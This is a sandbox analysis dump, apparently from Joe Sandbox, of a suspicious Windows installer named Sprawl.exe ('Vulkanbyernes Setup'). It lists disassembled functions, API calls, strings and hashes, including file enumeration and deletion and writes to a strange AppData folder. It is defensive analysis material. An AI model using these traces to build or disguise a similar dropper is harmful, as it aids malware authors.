                                                                                                                            • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404CE4
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404CF4
                                                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                            • String ID: $(N$M$N
                                                                                                                            • API String ID: 1638840714-1749088486
                                                                                                                            • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                                            • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                                                                            • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                                                                            • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

                                                                                                                             Control-flow Graph
                                                                                                                             control_flow_graph 427 404352-40437c 428 40437e-40438a call 405509 call 405f9a 427->428 429 40438f-404399 427->429 428->429 431 404407-40440e 429->431 432 40439b-4043b1 GetDlgItem call 40580e 429->432 435 404414-40441d 431->435 436 4044e5-4044ec 431->436 443 4043c3-4043fc SetWindowTextA call 403f14 * 2 call 403f49 call 4060c8 432->443 444 4043b3-4043bb call 40583a 432->444 439 404437-40443c 435->439 440 40441f-40442a 435->440 441 4044fb-404516 call 405509 call 40588f 436->441 442 4044ee-4044f5 436->442 439->436 447 404442-404484 call 405d51 SHBrowseForFolderA 439->447 445 404430 440->445 446 40468e-4046a0 call 403f7b 440->446 465 404518 441->465 466 40451f-404537 call 405d2f call 4060c8 441->466 442->441 442->446 443->446 485 404402-404405 SHAutoComplete 443->485 444->443 463 4043bd-4043be call 4057a1 444->463 445->439 459 404486-4044a0 CoTaskMemFree call 4057a1 447->459 460 4044de 447->460 472 4044a2-4044a8 459->472 473 4044ca-4044dc SetDlgItemTextA 459->473 460->436 463->443 465->466 483 404539-40453f 466->483 484 40456e-40457f call 405d2f call 40583a 466->484 472->473 476 4044aa-4044c1 call 405d51 lstrcmpiA 472->476 473->436 476->473 487 4044c3-4044c5 lstrcatA 476->487 483->484 488 404541-404553 GetDiskFreeSpaceExA 483->488 499 404581 484->499 500 404584-40459d GetDiskFreeSpaceA 484->500 485->431 487->473 490 404555-404557 488->490 491 4045c6-4045e0 488->491 494 404559 490->494 495 40455b-40456c call 4057e8 490->495 493 4045e2 491->493 497 4045e7-4045f1 call 4047e6 493->497 494->495 495->484 495->488 505 4045f3-4045fa 497->505 506 40460c-404615 497->506 499->500 500->493 503 40459f-4045c4 MulDiv 500->503 503->497 505->506 509 4045fc 505->509 507 404647-404651 506->507 508 404617-404627 call 4047ce 506->508 511 404653-40465a call 40140b 507->511 512 40465d-404663 507->512 520 404639-404642 SetDlgItemTextA 508->520 521 404629-404637 call 404709 508->521 513 404605 509->513 514 4045fe-404603 509->514 511->512 517 404665 512->517 518 404668-404679 call 403f36 512->518 513->506 514->506 514->513 517->518 525 404688 518->525 526 40467b-404681 518->526 520->507 521->507 525->446 526->525 528 404683 call 4042e7 526->528 528->525
                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                                                                            • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001,00000006,00000000,?,00000014,?,?,00000001,?), ref: 00404405
                                                                                                                            • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                                                                            • lstrcmpiA.KERNEL32(Space available: ,00429868), ref: 004044B9
                                                                                                                            • lstrcatA.KERNEL32(?,Space available: ), ref: 004044C5
                                                                                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                                                                              • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Sprawl.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                                              • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\Sprawl.exe",76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                                              • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                                            • GetDiskFreeSpaceExA.KERNELBASE(C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,?,?,00000001,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,?,000003FB,?), ref: 0040454E
                                                                                                                            • GetDiskFreeSpaceA.KERNEL32(C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,?,0000040F,?,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,00000001,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,?,?,000003FB,?), ref: 00404595
                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                                                                              • Part of subcall function 00404709: lstrlenA.KERNEL32(00429868,00429868,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                                              • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                                                                              • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,00429868), ref: 004047C2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharItemText$FreeNext$DiskSpace$AutoBrowseCompleteFolderPrevTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                            • String ID: (N$A$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Space available:
                                                                                                                            • API String ID: 4039761011-3582746545
                                                                                                                            • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                                                            • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                                                                            • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                                                                            • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69

                                                                                                                             Control-flow Graph
                                                                                                                             control_flow_graph 597 405d51-405d5c 598 405d5e-405d6d 597->598 599 405d6f-405d84 597->599 598->599 600 405f77-405f7b 599->600 601 405d8a-405d95 599->601 602 405f81-405f8b 600->602 603 405da7-405db1 600->603 601->600 604 405d9b-405da2 601->604 605 405f96-405f97 602->605 606 405f8d-405f91 call 405d2f 602->606 603->602 607 405db7-405dbe 603->607 604->600 606->605 609 405dc4-405df9 607->609 610 405f6a 607->610 611 405f14-405f17 609->611 612 405dff-405e0a GetVersion 609->612 613 405f74-405f76 610->613 614 405f6c-405f72 610->614 617 405f47-405f4a 611->617 618 405f19-405f1c 611->618 615 405e24 612->615 616 405e0c-405e10 612->616 613->600 614->600 622 405e2b-405e32 615->622 616->615 619 405e12-405e16 616->619 623 405f58-405f68 lstrlenA 617->623 624 405f4c-405f53 call 405d51 617->624 620 405f2c-405f38 call 405d2f 618->620 621 405f1e-405f2a call 405c8d 618->621 619->615 625 405e18-405e1c 619->625 635 405f3d-405f43 620->635 621->635 627 405e34-405e36 622->627 628 405e37-405e39 622->628 623->600 624->623 625->615 631 405e1e-405e22 625->631 627->628 633 405e72-405e75 628->633 634 405e3b-405e5e call 405c16 628->634 631->622 638 405e85-405e88 633->638 639 405e77-405e83 GetSystemDirectoryA 633->639 646 405e64-405e6d call 405d51 634->646 647 405efb-405eff 634->647 635->623 637 405f45 635->637 644 405f0c-405f12 call 405f9a 637->644 641 405ef2-405ef4 638->641 642 405e8a-405e98 GetWindowsDirectoryA 638->642 640 405ef6-405ef9 639->640 640->644 640->647 641->640 645 405e9a-405ea4 641->645 642->641 644->623 650 405ea6-405ea9 645->650 651 405ebe-405ed4 SHGetSpecialFolderLocation 645->651 646->640 647->644 653 405f01-405f07 lstrcatA 647->653 650->651 654 405eab-405eb2 650->654 655 405ed6-405eed SHGetPathFromIDListA CoTaskMemFree 651->655 656 405eef 651->656 653->644 658 405eba-405ebc 654->658 655->640 655->656 656->641 658->640 658->651
                                                                                                                            APIs
                                                                                                                            • GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
                                                                                                                            • GetSystemDirectoryA.KERNEL32(Space available: ,00000400), ref: 00405E7D
                                                                                                                            • GetWindowsDirectoryA.KERNEL32(Space available: ,00000400), ref: 00405E90
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
                                                                                                                            • SHGetPathFromIDListA.SHELL32(0041C205,Space available: ), ref: 00405EDA
                                                                                                                            • CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
                                                                                                                            • lstrcatA.KERNEL32(Space available: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                                                            • lstrlenA.KERNEL32(Space available: ,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                            • String ID: (N$Software\Microsoft\Windows\CurrentVersion$Space available: $\Microsoft\Internet Explorer\Quick Launch
                                                                                                                            • API String ID: 900638850-2320315919
                                                                                                                            • Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                                                            • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                                                            • Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
                                                                                                                            • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

                                                                                                                             Control-flow Graph
                                                                                                                             control_flow_graph 659 4055d1-4055f7 call 40588f 662 405610-405617 659->662 663 4055f9-40560b DeleteFileA 659->663 665 405619-40561b 662->665 666 40562a-40563a call 405d2f 662->666 664 40579a-40579e 663->664 667 405621-405624 665->667 668 405748-40574d 665->668 674 405649-40564a call 4057e8 666->674 675 40563c-405647 lstrcatA 666->675 667->666 667->668 668->664 670 40574f-405752 668->670 672 405754-40575a 670->672 673 40575c-405764 call 406033 670->673 672->664 673->664 682 405766-40577a call 4057a1 call 405589 673->682 677 40564f-405652 674->677 675->677 680 405654-40565b 677->680 681 40565d-405663 lstrcatA 677->681 680->681 683 405668-405686 lstrlenA FindFirstFileA 680->683 681->683 698 405792-405795 call 404f48 682->698 699 40577c-40577f 682->699 684 40568c-4056a3 call 4057cc 683->684 685 40573e-405742 683->685 692 4056a5-4056a9 684->692 693 4056ae-4056b1 684->693 685->668 689 405744 685->689 689->668 692->693 695 4056ab 692->695 696 4056b3-4056b8 693->696 697 4056c4-4056d2 call 405d2f 693->697 695->693 701 4056ba-4056bc 696->701 702 40571d-40572f FindNextFileA 696->702 709 4056d4-4056dc 697->709 710 4056e9-4056f4 call 405589 697->710 698->664 699->672 704 405781-405790 call 404f48 call 405bea 699->704 701->697 705 4056be-4056c2 701->705 702->684 707 405735-405738 FindClose 702->707 704->664 705->697 705->702 707->685 709->702 713 4056de-4056e7 call 4055d1 709->713 718 405715-405718 call 404f48 710->718 719 4056f6-4056f9 710->719 713->702 718->702 721 4056fb-40570b call 404f48 call 405bea 719->721 722 40570d-405713 719->722 721->702 722->702
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNELBASE(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                                            • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                                            • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                                            • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                                            Strings
                                                                                                                            • "C:\Users\user\Desktop\Sprawl.exe", xrefs: 004055D1
                                                                                                                            • \*.*, xrefs: 0040563C
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180046527.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180069644.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2180304293.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                            • String ID: "C:\Users\user\Desktop\Sprawl.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                            • API String ID: 2035342205-25746555
                                                                                                                            • Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                                                            • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                                                            • Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                                                            • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNELBASE(76233410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,76233410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 0040604A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
• Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
• Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
• Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; function at 403a41)

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
• ShowWindow.USER32(?), ref: 00403A9A
• DestroyWindow.USER32 ref: 00403AAE
• SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
• GetDlgItem.USER32(?,?), ref: 00403AEB
• SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
• IsWindowEnabled.USER32(00000000), ref: 00403B06
• GetDlgItem.USER32(?,00000001), ref: 00403BB4
• GetDlgItem.USER32(?,00000002), ref: 00403BBE
• SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
• SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
• GetDlgItem.USER32(?,00000003), ref: 00403CCF
• ShowWindow.USER32(00000000,?), ref: 00403CF0
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
• EnableWindow.USER32(?,?), ref: 00403D1D
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
• EnableMenuItem.USER32(00000000), ref: 00403D3A
• SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
• SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
• lstrlenA.KERNEL32(00429868,?,00429868,Vulkanbyernes Setup), ref: 00403D8E
• SetWindowTextA.USER32(?,00429868), ref: 00403D9D
• ShowWindow.USER32(?,0000000A), ref: 00403ED1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID: Vulkanbyernes Setup
• API String ID: 3282139019-4259525593
• Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
• Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
• Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
• Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; function at 4036af)

APIs
  • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
  • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
• lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,76233410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Sprawl.exe",00000000), ref: 0040372A
• lstrlenA.KERNEL32(Space available: ,?,?,?,Space available: ,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,76233410), ref: 0040379F
• lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
• GetFileAttributesA.KERNEL32(Space available: ), ref: 004037BD
• LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806
  • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
• RegisterClassA.USER32(0042DBA0), ref: 00403843
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
• CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
• ShowWindow.USER32(00000005,00000000), ref: 004038C6
• GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
• GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
• RegisterClassA.USER32(0042DBA0), ref: 00403908
• DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
Strings
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Sprawl.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\Sprawl.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Space available: $_Nb
• API String ID: 1975747703-3763382298
• Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
• Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
• Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
• Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

Control-flow Graph (graph image not reproduced; legend: Executed / Not Executed; function at 402c66)

APIs
• GetTickCount.KERNEL32 ref: 00402C77
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Sprawl.exe,00000400), ref: 00402C93
  • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 004059A6
  • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
• GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Sprawl.exe,C:\Users\user\Desktop\Sprawl.exe,80000000,00000003), ref: 00402CDF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2179993497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2179976731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
